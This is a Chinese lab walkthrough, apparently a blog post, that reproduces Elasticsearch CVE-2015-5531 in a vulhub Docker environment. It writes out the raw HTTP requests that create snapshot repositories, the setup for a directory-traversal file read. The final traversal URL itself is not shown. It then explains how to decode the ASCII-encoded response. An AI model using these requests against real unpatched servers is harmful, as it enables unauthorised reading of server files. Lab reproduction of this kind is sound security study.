vulhub漏洞环境搭建

https://blog.csdn.net/qq_36374896/article/details/84102101

启动docker环境

cd vulhub-master/elasticsearch/CVE-2015-5531/
sudo docker-compose up

1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。

访问192.168.91.130:9200

新建一个仓库:

PUT /_snapshot/test HTTP/1.1
Host: 192.168.91.130:9200
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 110 {
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test"
}
}

创建一个快照:

PUT /_snapshot/tes2t HTTP/1.1
Host: 192.168.91.130:9200
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 128 {
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
}
}

访问地址:

观察返回结果为ASCII编码:

可以用工具进行转换,或者直接使用Chrome-右键-检查-Console:

输入String.fromCharCode(ASCII码),执行结果如下:

最新文章

  1. mysql 用户管理和权限设置
  2. tensor flow入门笔记
  3. DragSelectRecyclerView 长按滑动多选图像android特效
  4. PHP路径常量和函数解释
  5. linux 学习随笔-文件目录管理
  6. CSS3绘制弹球动画效果
  7. 关于int,long,long long
  8. 五分钟,运用cocoaui库,搭建主流iOS app中我的界面
  9. js基础之动画(二)
  10. delete错误
  11. GNU FORK PTHREAD SIGNALS
  12. cc2530串口通信流程
  13. pytorch中tensorboardX的用法
  14. sql语句进阶教程
  15. Java -- JDBC 学习--PreparedStatement
  16. zabbix3.0.4-agent通过shell脚本获取mysql数据库登陆用户
  17. 内存溢出和内存泄漏的区别(ZZ)
  18. 设计模式 笔记 模版方法模式 Template Method
  19. java 获取计算机名称, ip, mac地址
  20. 如何修改jenkins的启动用户?

热门文章

  1. redis(一)-----初识redis
  2. Solution Set -「LOCAL」冲刺省选 Round XXII
  3. Dump Lsass内存转储新旧方法
  4. Centos 6 yum源
  5. 攻防世界-Crypto高手进阶区部分Writeup
  6. base家族在线解密工具
  7. Collection接口和Map接口的 size 方法和 isEmpty方法
  8. Codeforces Round #726 (Div.2) A-E1 题解
  9. Pandas:读取数据库read_sql
  10. ROS入门介绍